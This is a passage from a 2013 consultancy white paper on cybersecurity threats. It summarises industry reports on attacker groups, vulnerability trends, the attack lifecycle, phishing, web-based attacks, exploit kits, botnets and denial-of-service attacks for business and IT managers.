research, strategy and tacticsassets.blackswangroup.com.au.s3-website-ap-southeast-2.amazona… ·...
TRANSCRIPT
CYBERSECURITY
COUNTERINTELLIGENCE
RESEARCH, STRATEGY AND TACTICS
WHITE PAPER
Audience CISOs, CIOs, IT Managers, Risk Managers, Business Systems Owners
Author Keith Price, Director and Principal Consultant, Black Swan Group
Date June 2013
Contents
1.0 Executive Summary ...................................................................................................................................... 3
2.0 Why You Will Be Attacked ............................................................................................................................. 5
3.0 Who The Attackers Are ................................................................................................................................. 8
Organised Criminal Groups
State-Affiliated Groups Radical Activists
Insiders and Employees
4.0 How You Are Vulnerable ............................................................................................................................. 12
5.0 How You Will be Attacked ........................................................................................................................... 14
The Attack Lifecycle Malware and Hacking
External Targeted Attacks Phishing
Web-Based Attacks Exploit Kits
Botnets Denial of Service Attacks
6.0 The State of Security Technology Defences................................................................................................ 25
7.0 Recommendations ..................................................................................................................................... 28
Security as a Counterintelligence Function Break the Cyber Kill Chain
The Necessity of a Zoned Security Architecture
Develop a Security Improvement Roadmap
8.0 Conclusion .................................................................................................................................................. 34
9.0 About the Author ......................................................................................................................................... 35
10.0 About Black Swan Group ........................................................................................................................... 36
11.0 References ................................................................................................................................................ 37
Contact
Keith Price
Director & Principal Consultant
Black Swan Group Australia Pty Ltd
+61-438-138-535
3
After the 1984 IRA
bombing at the Grand
Hotel in Brighton
England targeting the
British cabinet the
IRA issued a
statement saying
“We only have to be
lucky once. You will
have to be lucky
always.”
1.0 Executive Summary
In cyberspace, attackers only have to be lucky once to compromise your
network, while you must be constantly vigilant, never letting your guard down.
Fail just once, and you’re owned. Your entire technology infrastructure –
operating systems, applications, user access credentials, and most importantly,
your information – is all in the attacker’s hands.
Protecting your business assets is challenging. Technology plays a major part,
but is not the whole solution. Cyber threats are evolving faster than the
technologies we can deploy against them, and no organisation can afford to
eliminate all cyber risks - the cost/benefit justifications just aren’t there.
To effectively manage cyber risk, the best response we have today starts with
asking the right questions, researching attackers’ motivations, capabilities, and
methods, identifying our most important assets, understanding where we’re
vulnerable, and being vigilantly aware of our own unique situation.
Our adversaries are highly sophisticated and deeply resourced. Preventing,
detecting and responding to today’s cyberattacks requires organisations to start
viewing information security more like a counterintelligence function.
“Counterintelligence” from over 50 recent security reports and online resources
This white paper provides you with the latest cybersecurity counterintelligence
as a starting point to explore new defensive measures. If there is one source of
counterintelligence you need to read, this is it. This paper incorporates key
findings from 25 recently released threat reports, surveys and databases from
vendors, consultancies, governments and industry associations, and more than
25 other online references. A comprehensive list of threat reports is provided
(see P37) for further reference and in the footnotes throughout.
Recommendations in response to key findings
This paper describes the “cyber kill chain” (see P29), a new model which helps
turn counterintelligence into action. Originally a military concept, the kill chain
refers to the stages of a cyberattack and the critical intervention points in the
chain to respond to an attack. The model enables us to analyse attacks in a
new way and direct resources to where they will have most impact. Break the
kill chain of the attack at any one point and you have thwarted the attacker.
The kill chain model highlights the need for a zoned security architecture that
includes concentric layers of protection. A zoned security architecture (see P31)
provides multiple barriers that the attacker must penetrate one at a time,
dramatically increasing the difficulty of exploitation and giving businesses an
increased opportunity to detect and stop attacks at various stages.
Bearing in mind that the ultimate objective of information security is business
process assurance, security also needs to grow from a collection of disparate
technologies and practices to an effective business process. A prioritised, risk
based “security improvement road map” (see P33) addressing people, process,
technology and organisational controls helps achieve this objective.
For more information about how to manage cybersecurity threats, contact Black
Swan Group for a discussion about how the strategies outlined in this paper may
help protect your organisation.
4
CYBER THREATS IN A BUSINESS CONTEXT
The diagram below illustrates how cyber threats fit in the context of your
business. Cyber threats arise through your business’s operating requirements.
Threat agents attempt to exploit vulnerabilities and compromise business
assets, and countermeasures must be put in place to defend against them.
Business asset owners need to be confident that the countermeasures are
adequate to protect against threats to assets. This paper provides the latest
research and thinking about threat agents, attack methods, vulnerabilities and
countermeasures to help business asset owners evaluate risks and protection
strategies. It should support your own knowledge about your business’s needs,
risks and the value of your assets.
Business Needs
Threat Agents
Threats
Countermeasures
Vulnerabilities
Risk
Assets
exploit
reduce
to
give rise to
Continuous Improvement ProcessLoop to Business Needs
are reduced by
Business Asset
Owners
impose
are
concerned
with
Figure 1: Business Needs, Threats, Vulnerabilities, and Countermeasures
(Source: Keith Price based on ISO/IEC 15408-1)
5
2.0 Why You Will Be Attacked
A recent survey released by CERT Australia1 found that over 1 in 5 organisations
experienced a cyber incident in the previous 12 months. It further found that
50% of organisations considered attacks on their organisation to be targeted.
This indicates a shift from previous views or conceptions, that most attacks are
non-targeted or indiscriminate. And while the majority of attacks were reported
to come from external sources, the fact that 44% originated from within
organisations serves as a reminder that internally-focused cyber security
controls and measures are important.
Of the Australian organisations that experienced cyber incidents, 17% suffered
from loss of confidential or proprietary information, 16% encountered a denial-
of-service attack, and 10% financial fraud.
The findings are revealing because they indicate that 17% of the organisations
had their information compromised despite having the following people,
processes, and technologies in place:
Over 90% of respondents deployed firewalls, anti-spam filters and anti-
virus software
66% had documented incident management plans
About 60% of organisations used IT security related standards
About 65% of organisations had staff with tertiary level IT security
qualifications
Over 50% had staff with vendor IT security certifications
The following graph shows that the volume of malware infections on average
during this financial year was about 16,500 malware reports each day –
representing what the Australian Internet Security Initiative (AISI)2 says is a
"significant level of malware" affecting Australians. These malware infections
were reported daily to about 130 ISPs and other network operators through the
AISI network.
1 Cyber Crime & Security Survey Report, 2012, https://www.cert.gov.au/ 2 http://www.acma.gov.au/Industry/Internet/e-Security/Australian-Internet-Security-Initiative
“There are two types
of companies: those
that have been
hacked and those
that will be hacked.” Robert Mueller, FBI Director,
speaking at the 2012 RSA
Conference.
6
Figure 2: Daily Count of Australian IP Addresses Identified as
Having Malware-infected Devices Behind Them Source: Australian Communications and Media Authority
The majority of cyberattacks by far occur in the United States but Australia,
India, and the Netherlands are tied for third at 3%.IBM
Figure 3: Security Incidents by Country, 2012
Source: IBM X-Force Trend & Risk Report 2012
The general trend today is a greater overall number of breaches involving
different kinds of assets. Information is being stolen and sold online in
unprecedented levels and professionally written malicious code is behind most
of this data theft.
Cybercriminals favour payment and personal information that can easily be
converted into cash. Spy types prefer trade secrets (eg schematics and
formulas), internal organisational data (eg e-mails and reports), and system
information. Hacktivists like the titillating aspect of personal information and
internal organisational data. Credentials are fun for the whole family.Verizon
7
The following figure indicates the types of data that were compromised or
breached in the past 12 months:
Figure 4: Types of Data Compromised
Source: The State Of Data Security And Privacy: 2012 To 2013, Forrester
IBM declared 2011 the “Year of the Security Breach” because it had the highest
number of recorded data loss incidents to date.3 In 2012, there were 1,502
documented incidents — a rise of nearly 40%.IBM 2012 data makes it clear that
any business, no matter its size, was a potential target for attackers. In fact,
50% of all targeted attacks were aimed at businesses with fewer than 2,500
employees. And 35% of all targeted attacks are targeted at companies with
fewer than 500 employees.Sym_Supp
For Australia this is significant because the vast majority (96%) of Australian
businesses are small businesses.4 Many small businesses assume that they
have nothing an attacker or hacktivist would want to steal. But most every
company regardless of size has money in the bank, some customer or business
partner information, and, for others, proprietary information. Certainly the
rewards of attacking a large enterprise are more significant than that of a
smaller company however smaller companies just don’t have the funds or
skilled staff so they make for easier targets.
Governments too are targets. The U.S. government’s National Security Agency
(NSA) works under the assumption that they have been compromised. Deborah
Plunkett, who heads the NSA's Information Assurance Directorate says “There’s
no such thing as ‘secure’ any more. The most sophisticated adversaries are
going to go unnoticed on our networks. We have to build our systems on the
assumption that adversaries will get in. We have to…assume that all the
components of our system are not safe, and make sure we’re adjusting
accordingly”.5
3 https://www-950.ibm.com/events/wwe/grp/grp004.nsf/vLookupPDFs/IBM%20X-
Force%202012%20Cyber%20Security%20Threat%20Landscape/$file/IBM%20X-Force%202012%20Cyber%20Security%20Threat%20Landscape.pdf 4
http://www.abs.gov.au/ausstats/[email protected]/Latestproducts/8165.0Media%20Release1Jun%202007%20to%20Jun%202011?opendocument&tabname=Summary&prodno=8165.0&issue=Jun%202007%20to%20Jun%202011&num=&view= 5 http://www.reuters.com/article/2010/12/16/us-cyber-usa-nsa-idUSTRE6BF6BZ20101216
8
3.0 Who The Attackers Are
Attacker’s actions can be malicious or non-malicious, intentional or
unintentional, causal or contributory. Identifying actors is critical to immediate
corrective actions and longer-term defensive strategies.Verizon
There are four general attack groups:
Organised criminal groups
State-affiliated groups
Radical activists
Insiders
ORGANISED CRIMINAL GROUPS
Criminal gangs in Eastern Europe have historically dominated financially
motivated attacks. Their preferred method is to compromise a card processing
vendor or transaction clearing centre to get access to the card data. Other
methods also include fake electronic funds transfers (EFTs) and secret premium-
rate SMS messages on smartphones.
More than half of all external breaches are tied to organised criminal groups.
This reflects the high prevalence of illicit activities associated with threat actors
of this ilk, such as spamming, scamming, payment fraud, account takeovers,
identity theft, etc. For professional criminals, the “why” is simple and consistent
- money. Most attacks originate either in the U.S. or Eastern European countries
(eg Romania, Bulgaria, and the Russian Federation). Payment cards have been
a lock as the most oft-stolen data type.Verizon
STATE-AFFILIATED GROUPS
State-affiliated groups seek data that furthers national interests, such as military
or classified information, economy-boosting plans, insider information or trade
secrets, and technical resources such as source code. They will generally not
target payment systems and information. Phishing-malware-hacking-
entrenchment is the staple of espionage campaigns. Verizon See page 18 for more
about phishing.
96% of espionage cases were attributed to threat actors in China.Verizon China
once again overwhelmingly remained the source of the largest volume of attack
traffic as well, accounting for 40% of the total, up from a third in the prior
quarter.AKAMAI
When Mandiant first published details about the Advanced Persistent Threats
(APT) in their 2010 M-Trends report, they stated that “The Chinese government
may authorize this activity, but there’s no way to determine the extent of its
involvement.” Now, three years later, Mandiant’s 2013 report states they have
analysed new evidence from hundreds of investigations to conclude that the
groups conducting these APT activities are based primarily in China and that the
Chinese Government is aware of them.Mandiant
Organisations in all industries related to China’s strategic priorities are potential
targets for APTs’ comprehensive cyber espionage campaign. The following
figure indicates the industries compromised by cyberattacks:
The enemy invariably
attacks on two
occasions:
a. When they're ready.
b. When you're not. Canonical Murphy's Laws of
Combat
9
Figure 5: Industries Compromised by Cyberattacks
Source: Mandiant APT1 Report, March 2013
RADICAL ACTIVISTS
Another name for radical activists is hacktivists. Hacktivism exploded in 2012,
and became the number one cyber outlet of choice for the public expression of
controversial opinions – political and economic – as well as a means for
protesting ideological conflicts. Today’s hacktivist groups predominantly are
non-related teams (or individual hackers) who attack entities – alleged “culprits”
– according to the attackers’ own political, religious, social or economic
agendas.RSA Anonymous is the largest and most well-known hacktivist group.6
The proportion of incidents involving activist groups has been consistent over
the past year or so but the amount of data they stole this year is down
substantially from 2011. Much of the activity claimed by hacktivists in 2012
shifted primarily to denial of service (DoS) attacks.Verizon See page 23 for more
about DoS attacks.
INSIDERS AND EMPLOYEES
Findings from PWC global survey of 12,052 senior executives identified current
and former employees as the greatest source of risk to their organisations, as
indicated in the following figure.
6 For more information, visit: http://www.informationweek.com/security/attacks/who-is-anonymous-10-key-facts/232600322?pgno=1
10
Figure 6: Estimated Likely Source of Incidents
Source: Key findings from the PWC Global State of Information Security Survey
A 2012 IBM/Ponemon study of 265 C-level executives reinforced this finding,
with 43% of respondents saying that negligent insiders were the number one
greatest risk to sensitive data.PONEMON
Contributing to risks, in 91% of organisations, users were found to be using
applications with a potential to bypass security, hide identities, cause data
leakage or even introduce a malware infection without their knowledge.CHECK POINT
Weak and default passwords continue to be a notable risk. Unbelievably, the
most common passwords for 2012 were still “Welcome1” and “Password1”.
These two passwords, based on the requirements of Active Directory, are no
different than the password “J*1maw)2” even though one password is obviously
far harder to guess than the other. This is the result of Active Directory
examining the password as a whole to determine whether it follows the rules
instead of comparing it to dictionary words or slight variations like Linux does.
Passwords once thought to be complex enough to make cracking improbable
are now able to be reversed in hours or days. This requires users and
administrators to rethink how they create passwords and how users are
educated about password security. A passphrase is also easier to remember
and doesn’t need to be written down. Not only do long passphrases make brute
force attacks impractical for an attacker, they also combat rainbow table-based
attacks given their large disk space requirements.Trustwave
11
In summary, the following table lists threat agents and their preferred methods of attack:
Figure 7: Threat Agents and Exploits
Source: ENISA Threat Landscape Report, January 2013
12
4.0 How You Are Vulnerable
Well known vulnerabilities7 are key targets for hackers who rely on the simple
fact that many organisations do not update their software on a regular basis.
The bigger the organisation, the harder it is for security administrators to keep
all systems fully updated.
In 2012, IBM saw 8,168 publicly disclosed vulnerabilities, an increase of 14%
over 2011.IBM No IT administrator is going to be able to manually keep constant
track of the patch state of all the programs on all computers in their system.
Vulnerabilities in software will continue to be a major risk factor, increasing the
importance of patch management in the critical path to security.
The following figure shows the top 10 vendors by vulnerability disclosures in
2012. Compared to the average numbers of the preceding 10 years, only one of
these 10 vendors (Microsoft) managed to decrease the number of vulnerability
disclosures in its products in 2012. All other vendors increased their
vulnerability numbers in 2012NSS_1
Figure 8: Top 10 vendors by vulnerability disclosures Source: NSS Labs Vulnerability Threat Trends 2013
Web applications are still topping the chart of most disclosed vulnerabilities,
rising 14% in 2012 over the 2011 end of year numbers. Cross-site scripting
(XSS) dominated the web vulnerability disclosures at 53% of all publicly released
vulnerabilities. Although SQL injection attack methods remain as a top attack
technique, the actual disclosures of new SQL injection vulnerabilities remain
lower than the 2010 peak IBM recorded.IBM
7 For more information on vulnerabilities, visit the U.S. National Vulnerability Database site at http://nvd.nist.gov/
13
The following figure shows web applications vulnerabilities by attack technique:
Figure 9: Web Application Vulnerabilities by Attack Technique, 2006 to 2012
Source: IBM X-Force Trend & Risk Report 2012
The complexity to execute a successful attack is an important factor to assess
the risk of a vulnerability. A highly critical vulnerability that can only be exploited
under very specific circumstances might require less immediate attention than a
less critical vulnerability for which automated exploitation functionality is easily
available in crimeware or penetration testing kits.NSS_1
The figure below illustrates that the share of low complexity vulnerabilities – the
easiest to exploit – repeatedly decreased from a high on over 90% early in the
century to 48%, or a total of 2,534 in 2012.
Figure 10: Complexity Required to Successfully Exploit a Vulnerability (lower complexity = greater risk)
Source: NSS Labs Vulnerability Threat Trends 2013
In the same period, medium complexity vulnerabilities increased their share
from below 5% to 47%, or 2,431, in 2012. Disclosures of high complexity
vulnerabilities have been mostly stable in the last decade at an average share of
4%. This data documents a clear (but slowing) trend towards an increase in
attack complexity. Vulnerabilities with a high criticality paired with low attack
complexity pose a clear and present threat to the user of the affected software.
A considerable 484, or 9.2%, of the vulnerabilities disclosed in 2012 had a
CVSS8 base score of 9.9 or more paired with a low attack complexity.NSS_1
8 See www.first.org/cvss
14
5.0 How You Will be Attacked
The Internet connects criminals to a virtually limitless host of potential victims.
It is boundary less in that cybercriminals can sit at their computers in one
country and attack a person or company in another country.
Cybercriminals have been successful for six primary reasons:
The basic protocol of the Internet – TCP/IP – is inherently insecure and
was not designed with security in mind
There are over a billion people who use the Internet and each one can be
a potential victim
The sheer number of machines with unpatched operating systems and
applications creates a massive array of potential targets to compromise
with the latest malware
Software programmers have not historically considered security as a
primary part of their software design, leaving a treasure chest of
vulnerabilities that cybercriminals exploit
The Internet is an open network of networks with no central police or
regulatory authority
Spoofing IP addresses, compromising legitimate servers from where to launch
attacks, deleting log files, all to cover their tracks. The Internet enables many
hacking methods to be highly scalable, automated, targeted, and conducive to
anonymity. AKAMAI
The rise of ecommerce, increased network connectivity with business partners
and employees, the complexities of bespoke applications and legacy systems,
and the increasing threat from nation-states, cybercriminals and hacktivists
make cyber black swan events9 inevitable.
Hackers’ techniques are constantly changing, using more advanced and
sophisticated attack methods, raising the security challenge year after year.
Attack trends in 2012 took advantage of well publicised legacy issues such as
password security, ineffectual security controls, and legacy devices, protocols
and attacks. What is different about today is the attacker’s “own the
environment” nature of attacks.
There are multiple entry points to breach an organisation’s defences: malicious
attachments, browser-based vulnerabilities, removable media, mobile devices,
etc. The initial point of entry is rarely the ultimate target; additional
reconnaissance and lateral movement are needed to identify the location of
valuable data (commonly called “establishing a beachhead”). Once a
beachhead is formed, attackers conduct network scanning to determine what
other systems are either on the same network segment or communicating with
the compromised host. This information is then used to move laterally and
penetrate deeper into the target’s infrastructure and find valuable data.Trustwave
9 In his book The Black Swan, IMF advisor Nassim Taleb describes a ‘black swan event’ as having three attributes: rarity, extreme impact and
retrospective predictability.
What is different
about today is the
attacker’s “own the
environment” nature
of attacks.
15
THE ATTACK LIFECYCLE
Cyberattackers typically operate in a few broadly defined steps as indicated in the following attack lifecycle:
Figure 11: Attack Lifecycle
Source: E&Y/ISACA Responding to Targeted Cyberattacks Report, 2013
Lifecycle Step
Objective
Conduct background research Detailed research on targets to identify targeted avenues of attack.
Execute initial attack The initial attack targets one or more specific individuals through some form
of social engineering.
Establish foothold Establish an initial foothold into the target environment using some version
of customised malicious software.
Enable persistence Establish persistent command and control over compromised computers in
the target environment.
Conduct enterprise reconnaissance To find the computers, servers or storage areas holding the information they
have been instructed to steal.
Move laterally to new systems
Understand to what new parts of the enterprise the attacker might gain
access from the new systems. Also install command-and-control software
on new systems to expand persistent access to the environment.
Escalate privileges Escalate from local user to local administrator to higher levels of privilege so
that attacker is not constrained to any specific part of the environment.
Gather and encrypt data of interest
Gather captured data into an archive and then compress and encrypt to hide
from technologies such as deep packet inspection capabilities and from
data loss prevention (DLP) at the enterprise boundary.
Exfiltrate data from victim systems Use HTTP, HTTPS, FTP or custom data transfer technologies operating on
standard and nonstandard ports.
Maintain persistent presence Maintain long-term access to the target environment.
Table 1: Attack Lifecycle Steps and Objectives
Source: E&Y/ISACA Responding to Targeted Cyberattacks Report, 2013
16
MALWARE AND HACKING
Malware and hacking still rank as the most common attack methods, but they
scaled back rather significantly among 2012 breaches. Direct installation of
malware by an attacker who has gained access to a system is again the most
common vector.Verizon
Attackers use various techniques referred to as attack vectors. The following
figure lists some of these attack vectors, according to the percentage of
organisations that suffered from them. Memory Corruption, Buffer Overflow and
Denial of Service are the most popular attack vectors found in Check Point’s
research.Check Point
Figure 12: Top Attack Vectors
Source: Check Point Security Report 2013
75% of the malware files reported to Sophos are only ever seen in one
organisation. This level of polymorphism is unprecedented. What’s more,
attackers have begun to develop and use far more sophisticated approaches to
polymorphism to hide their attacks from security vendors and IT
organisations.Sophos
In 2012 more than 80% of the threats Sophos saw were redirects, mostly from
legitimate sites that have been hacked. A powerful warning to keep your site
secure and your server scripts and applications up to date.Sophos
Client-side attacks—both targeted and en masse—are also on the rise. These are
perpetrated by both Web-based systems and email, two vectors that are most
used but in many cases least protected.Trustwave
17
The vast majority of attacks are opportunistic. Opportunistic attacks are those
where the victim isn’t specifically chosen as a target; they were identified and
attacked because they exhibited a weakness the attacker knew how to exploit.
It’s notable that the majority of breaches result from simpler opportunistic
attacks than from money-hungry organised criminal groups.Verizon
EXTERNAL TARGETED ATTACKS
While the majority of cyberattacks are opportunistic, targeted attacks can be the
most dangerous. A targeted attack occurs when attackers target a specific
organisation over a long time span. Often the objective of targeted attacks is
either data exfiltration or gaining persistent access and control of the target
system. These attacks need time (in some cases a few years) to be detected
and are rather hard to avoid.
Targeted attacks are commonly used for the purposes of hacktivism and
industrial espionage to gain access to the confidential information on a
compromised computer system or network. They are rare but potentially the
most difficult attacks to defend against. Targeted attacks combine social
engineering and malware to target individuals in specific companies with the
objective of stealing confidential information such as trade secrets or customer
data. They often use custom-written malware and sometimes exploit zero-day
vulnerabilities, which makes them harder to detect and potentially more
infectious.
Targeted attacks use a variety of vectors as their main delivery mechanism, such
as malware delivered in an email, or drive-by downloads from an infected
website the intended recipient is known to frequent, a technique known as a
”watering hole” attack.Sym
Over the past year, we’ve seen a significant rise in the volume of external
attacks as indicated in the following figure:
Figure 13: Change in the Risk Environment during 2012
Source: Ernst & Young’s 2012 Global Information Security Survey
In 2009, 41% of respondents noticed an increase in external attacks. By 2011,
that number had leapt to 72%. In 2012, the number of respondents indicating
an increase in external threats has risen again to 77%.E&Y
In terms of cyber security incidents, more than half of Australian organisations
surveyed considered attacks on their organisation to be targeted. This indicates
a shift (in an Australian context) from previous views or conceptions, that most
18
attacks are non-targeted or indiscriminate. And while the majority of attacks
were reported to come from external sources, the fact that 44% originated from
within organisations serves as a reminder that internally-focused cyber security
controls and measures are also important.CERT_AU
PHISHING
Phishing refers to hoax e-mail messages that look like they are from your bank,
another financial institution or business, that ask you to visit a fraudulent
website that looks like the bank’s or other financial institution or business, in
order to confirm account information including usernames and passwords.10
From 2010 to 2012, the email scam/phishing volume nearly quadrupled,
reaching more than 83% of the 2008 levels in spring 2012. IBM In February
2012, the number of unique phishing sites recorded by APWG reached an all-
time high of 56,859 which indicates this criminal activity is not decreasing.
While the overall number of targeted institutions has dropped, phishers continue
to target larger or more popular targets.Anti
Phishing attacks are often through emails containing an infected PDF, Word, or
Excel document to a targeted individual known within an organisation. This is
called “spear phishing” or “whaling” when directed specifically at senior
executives and other high profile targets.
Phishers use various social engineering techniques to lure their victims into
clicking on an infected attachment, a link to a malicious website, or providing
information such as passwords or personal details. When opened, the PDF,
Word, or Excel document triggers a previously unknown or zero-day exploit to
compromise the machine. The attacker can then use this foothold to get deeper
into the network and complete the breach.Verizon
A successful phishing campaign requires a series of “and” statements for every
step in a campaign. With each added step, the probability of a system
compromise goes down. For example, a user needs to take action AND there
needs to be a vulnerability on the system AND software has to be quietly
installed AND there has to be a communication path back to the attacker, and,
and, and this is why we have the term “defence in depth.Verizon
There are four general approaches to targeted attacks through phishing
emails:Trustwave
Social engineering: Common email themes are conferences, internal
communications, employee reviews, surveys, meeting invitations and
security updates.
Context: The email makes sense to an employee of that organisation.
Homework: Attackers do their research, collect employee email addresses,
and the “From” field is changed so it appears to come from someone
known to the organisation.
Attachments/links: There is typically a malicious attachment (.doc, .xls,
.pdf) that contains exploit code. Executable file attachments and links are
also used.
10 http://www.protectfinancialid.org.au/default.aspx?ArticleID=16#phishing
The fact that 44% [of
attacks] originated
from within
organisations serves
as a reminder that
internally-focused
cybersecurity
controls and
measures are also
important.CERT_AU
19
As indicated in the following diagram, in 2012 the most frequently targeted
job role for phishing was in R&D, which accounted for 27% of attacks (9% in
2011). The second most notable increase was against sales
representatives, probably because their contact details are more widely
available in the public domain, with 24% of attacks in 2012 versus 12% in
2011. In 2011, C-level executives were the most targeted, with 25%, but
this number fell to 17% in 2012.Sym
Figure 14: Targeted Attack Recipients by Role, 2012
Source: Symantec Internet Security Threat Report, Volume 18, 2013
Executives and managers make sweet targets for criminals looking to gain
access to sensitive information via spear phishing campaigns. Not only do they
have a higher public profile than the average end user, they’re also likely to have
greater access to proprietary information. Plus, we all know how much they love
.ppt and .pdf attachments.Verizon
WEB-BASED ATTACKS
Web browsers are the most used programs to access the Internet from
desktops, laptops, tablets, and mobile devices. Web browser vulnerabilities are
a serious security concern due to their role in online fraud and in the
propagation of malicious code, spyware, and adware. In addition, Web browsers
are exposed to a greater amount of potentially untrusted or hostile content than
most other applications and are particularly targeted by multi-exploit attack
kits.Sym_Supp
The following figure shows web browser usage over the past 12 years with
Google’s Chrome skyrocketing to the top spot:
20
Figure 15: Web Browser Usage
Source: NSS Labs Vulnerability Threat Trends 2013
Overall web browser vulnerabilities declined slightly for 2012. While the overall
number of web browser vulnerabilities dropped by a nominal 6% from 2011, the
number of critical and high severity web browser vulnerabilities saw an increase
of 59% for the year.IBM The following figure represents the increasing number of
critical and high web browser vulnerabilities over the years:
Figure 16: Web Browser Vulnerabilities, Critical and High 2005 to 2012
Source: IBM X-Force Trend & Risk Report 2012
Expanding on functionality beyond just the browser, a web client is much more;
it’s a full-blown platform, with infrastructure, utilities and extensibility via plug-
ins. This extensibility is what poses the most vulnerability, as malware authors
disguise exploit kits as browser plug-ins. For years, malware authors have been
obfuscating their code to avoid AV signature detection, and this process is now
automated (polymorphic JavaScript obfuscators are common in exploit kits, for
example). With the shift from HTML/JavaScript-centric browser attacks to
browser plug-in attacks, it was only a matter of time before malware authors
would adopt the same techniques. This means Java and ActionScript (the
programming language used in Flash) now use automated obfuscation tools to
avoid AV signature detection.Trustwave
Ever expanding sophistication of malware and the increasing number of
vulnerabilities makes the web the most formidable malware delivery mechanism
21
we’ve seen to date, outpacing even the most prolific worm or virus in its ability to
reach and infect a mass audience silently and effectively.Cisco.
Web malware encounters occur everywhere people visit on the Internet including
the most legitimate of websites that they visit frequently, even for business
purposes. Business and industry sites are one of the top three categories
visited when a malware encounter occurred. Malicious scripts and iFrames
comprised 83% of encounters in 2012, relatively consistent with previous years.
These types of attacks often represent malicious code on “trusted” webpages
that users may visit every day, meaning an attacker is able to compromise users
without even raising their suspicion. Cisco
The number of web-based attacks has increased by almost a third in 2012.Sym
These attacks silently infect enterprise and consumer users when they visit a
compromised website. Drive-by downloads attacks against web browsers have
become the top web threat. ENISA A drive-by exploit refers to the injection of
malicious code in HTML code of websites that exploits vulnerabilities in user web
browsers. These attacks target software residing in Internet user computers
(web browser, browser plug-ins and operating system) and infect them
automatically when visiting a drive-by download website, without any user
interaction.
Typically, attackers infiltrate a legitimate website to install their attack toolkits
and malware payloads, unbeknown to the site owner or the potential victims.
The malware payload that is dropped by web-attack toolkits is often server-side
polymorphic or dynamically generated, rendering enterprises that rely on
signature-based antivirus protection unable to protect themselves against these
silent attacks. A hidden piece of JavaScript or a few lines of code linking to
another website can install malware that is very difficult to detect.Sym
Analysing more than 5 million malicious URLs passing through Trustwave Secure
Web Gateway, Trustwave found that the popular exploits targeted products like
Internet Explorer (IE), Adobe Acrobat Reader, Adobe Flash Player, Oracle Java,
and Microsoft Office. Of all client-side attacks observed, 61% targeted Adobe
Reader users via malicious PDFs. Trustwave
As we saw earlier in Figure 8, Oracle was the vendor with the most vulnerability
disclosures in 2012. In early 2013, Oracle rushed out a security update
repairing a Java zero-day vulnerability that was being actively targeted by
attackers. Soon after, Oracle released a Java security update to repair 50
vulnerabilities, 49 of which are remotely exploitable by attackers in the browser.
This prompted the US-CERT to recommend disabling Java in web browsers.11
Another attack through web applications is a code injection attack such as SQL
injection (SQLi), cross-site scripting (XSS), cross-site request forgery (CSRF), and
Remote File Inclusion (RFI). The goal of these attacks is to extract data, steal
credentials, or take control of the targeted webserver. A significant increase in
reported XSS attack cases has been observed during the last years. Moreover,
XSS attacks work on any browsing technology including mobile web browsers.
The most critical vulnerability for traditional and Web 2.0 applications is XSS.ENISA
Naturally, the majority of web-based attacks exploit the most common
vulnerabilities. These attacks are successful primarily because enterprise,
11 http://www.us-cert.gov/ncas/alerts/TA13-032A
Drive-by downloads
attacks against web
browsers have
become the top web
threat. ENISA
22
government, and consumer systems are not up to date with the latest patches
for their many IT products.
EXPLOIT KITS
An exploit kit is a purpose-built, ready-to-use software package that automates
attack activity. They first appeared in 2006 and continue to be popular because
they provide attackers a turnkey solution for installing malware on end-user
systems. A sophisticated underground economy provides both the malware to
enable hackers to commit their cybercrimes and the ecommerce facilities to sell
the financial data and intellectual property they steal. Financially motivated
developers keep creating new and better versions, supplying the marketplace
with exploit kits. The Blackhole exploit kit remains the most popular. Blackhole
exploits vulnerable browser plug-ins such as Java, Adobe Reader and Adobe
Flash Player. ENISA
A close inspection of Blackhole reveals just how sophisticated malware authors
have become. Blackhole is now the world’s most popular and notorious
malware exploit kit. It combines remarkable technical dexterity with a Software-
as-a-Service rental model that could have come straight from a Harvard
Business School MBA case study. And, barring the unlikely takedown by law
enforcement, security vendors and IT organisations are likely to be battling it for
years to come.Sophos
Over the past 12 months we observed significant investment by cybercriminals
in toolkits like the Blackhole exploit kit. They’ve built in features such as
scriptable web services, APIs, malware quality assurance platforms, anti-
forensics, slick reporting interfaces, and self-protection mechanisms. In the
coming year, you should expect to see a continued evolution in the maturation of
these kits replete with premium features that appear to make access to high
quality malicious code even simpler and comprehensive. Sophos
By far, remote access remained the most widely used method of infiltration in
2012. Custom remote access tools are more closely related to common Trojans
and malware kits. The skills to develop completely custom remote access tools
limits this technology to the higher tiers of attackers. Although the complexity
and behaviour of these tools introduce additional challenges in antivirus
evasion, their limited distribution appears highly effective in preventing
detection. Remote access can range from full-on remote desktop to simple bot-
like command and control (C&C) channels. Poorly configured remote
administration is a leading infection vector, and maintaining that access is often
vital to exfiltration.Trustwave
2012 saw Trojan development increase more than in any previous time
period.RSA Zeus is the most popular banking Trojan in use and the most
successful Zeus offshoot so far also surfaced in 2012. Citadel, a banking Trojan
that was introduced to the underground early in the year, has evolved into the
most sophisticated Trojan business model the world of commercial malware has
ever known. It even has the ability to map corporate networks.RSA
Citadel, a banking
Trojan, has evolved
into the most
sophisticated Trojan
business model the
world of commercial
malware has ever
known.RSA
23
BOTNETS
A botnet is a large group of compromised computers under the direct control of
an attacker (bot master). Compromised systems are called bots (short for web
robots) and they communicate with the bot master who controls them for email
spamming, distributing malware, and infecting other systems, turning them into
bots. Interestingly, the U.S. was home to 1 in 7 (15%) of global bot-infected
computers with an average lifespan of 13 days.Sym
It has been estimated that up to one quarter of all personal computers
connected to the internet may be part of a botnet. In 2011, the TDL Botnet
infected more than 4.5 million computers and approximately 100,000 unique
addresses per day.12 Check Point found that 63% of organisations are infected
with bots, with most organisations infected by a variety of bots.Check Point Ever
evolving, the more experienced attackers are using smaller botnets with
decentralised command and control infrastructure that are more difficult for law
enforcement to track and take down.
DENIAL OF SERVICE ATTACKS
DoS attacks are not new but in recent years, they have been gaining in
popularity in large part because the technical barriers to creating such an attack
are small and because it is difficult and time consuming to track an attack back
to its true source.AKAMAI
When hacktivists use DoS attacks, the attacks are aimed at gaining notoriety
and making a political statement so hacktivists focus on disrupting online
services through DoS and distributed denial of service (DDoS) attacks. To
achieve this goal, adversaries take control of multiple hosts on one or more
networks, without the owner’s knowledge, to launch automated requests at
online services such as Domain Name Services (DNS), websites and email.13
Figure 17: DoS Attacks on Industry
Source: Arbor Worldwide Infrastructure Security Report Volume XIII 2012
The number of DDoS attacks in 2012 grew significantly from 2011. 2012 saw
768 attacks reported by their customers, a year-over-year increase of more than
200%. This includes lower layer attacks such as SYN floods, UDP floods and
many other common types of volumetric attacks including higher level attacks
